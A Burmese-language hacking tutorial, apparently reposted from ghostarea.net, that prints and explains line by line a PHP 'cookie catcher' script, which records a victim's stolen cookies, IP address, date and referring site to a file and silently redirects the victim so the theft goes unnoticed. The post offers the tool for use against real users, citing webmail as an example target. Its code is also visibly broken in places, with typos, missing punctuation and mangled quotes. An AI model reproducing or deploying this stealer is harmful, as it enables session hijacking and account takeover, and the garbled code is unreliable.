ဒီေန႕ေတာ့ Cookies Catcher ေတြအေၾကာင္းေျပာရေအာင္.။ Cookies Catcher ဆိုတာ Cookies ေတြကို Capture လုပ္ဖို႕ လုပ္ထားတဲ့ PHP Script ပါ။ ( Cookies ဆိုတာေတာ့အထူးေျပာဖို႕လိုမယ္မထင္ပါဘူး Browser ေတြမွာ User Login ေတြ Password ေတြကို သိမ္းထားတဲ့ Special Things ေတြေပါ့ ) ကဲ အခု Cookies Catcher တစ္ခုအေၾကာင္းၾကည့္ရေအာင္.။
Code
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Website: '.$referer.'
');
fclose($fp);
header (\"javascript:history.back()\");
?>
တစ္ခုခ်င္းစီကိုၾကည့္ရေအာင္ဗ်ာ။
Code
$cookie = $_GET['cookie'];
ဒါကေတာ့
Get Method
နဲ႕
Cookie
ကိုယူပါတယ္
Code
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$referer=$_SERVER['HTTP_REFERER'];
REMOTE_ADDR
ကေတာ့
Victim
ရ႕ဲ
IP
ပါ
date
ကေတာ့
Cookies
ယူတဲ့ ေန႕ပါ
HTTP_REFERER
ကေတာ့
Cookies
သိမ္းခံရတဲ့
Address
ပါ
(
ဥပမာ
Mail.google.com
ေပါ့
) XD
Code
$fp = fopen('cookies.html' 'a');
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Website: ‘.$referer.’
’);
fclose($fp);
ဒီေနရာေလးကေတာ့ နည္းနည္းရႈပ္သြားပါတယ္ ။ ပထမဆံုး
cookies.html
ဆိုတဲ့
File
ကိုဖြင့္ပါတယ္ ျပီးတာနဲ႕ အဲ့ဒီ့ဖုိင္ထဲမွာ
Cookies
ကိုသြား
Write
ပါတယ္ ။ ခုန အထက္က ေရးထားတဲ့
IP , Date , Referer
ေတြေရာေပါ့ ျပီးတာနဲ႕
cookies.html
ကို ပိတ္လုိက္ပါတယ္
Code
header (\"
javascript:history.back
()\");
ေနာက္ဆံုးအေၾကာင္းအေနနဲ႕ေတာ့
User
ကို
Cookies Catcher
ထဲကိုေရာက္ျပီး
Catcher
က
Cookies
ေတြသိမ္းအျပီး ဘယ္ကို ျပန္ပို႕မယ္ဆုိတာပါ အခုေတာ့ ၀င္ခဲ့တဲ့ေနာက္တစ္ေနရာကိုျပန္ပို႕ထားပါတယ္
(
ဥပမာ
User
က
www.site.com/index.php?=shop.php
က
လာတယ္
အဲ့မွာ
Cookies Catcher
ကို၀င္မိသြားတယ္
www.target.com/cookiescatcher.php
ေပါ့
Cookies Catcher
ကလည္း
cookies.html
မွာ
Cookies
ေတြသိမ္းတယ္
ေရာက္သြားတာနဲ႕
Cookies
သိမ္းသြားတာကို
User
မသိလိုက္ပါ
ျပီးမွ
သိမ္းျပီးမွ
User
ကိုတစ္ေနရာရာျပန္ပို႕လုိက္ပါတယ္
ဥပမာ
index.php
ကိုပဲေပါ့
)
ကဲ
ဒီေလာက္ဆုိ
အဆင္ေျပမယ္ထင္ပါတယ္
ဒီလုိမ်ိဳး
တျခားတစ္ေယာက္ေရးထားတာ
ဖတ္ဖူးလို႕
သူ႕ဟာကိုရွာမရတာနဲ႕
ကိုယ္တိုင္စမ္းတ၀ါး၀ါးေရးလိုက္ရပါတယ္
source from ghostarea.net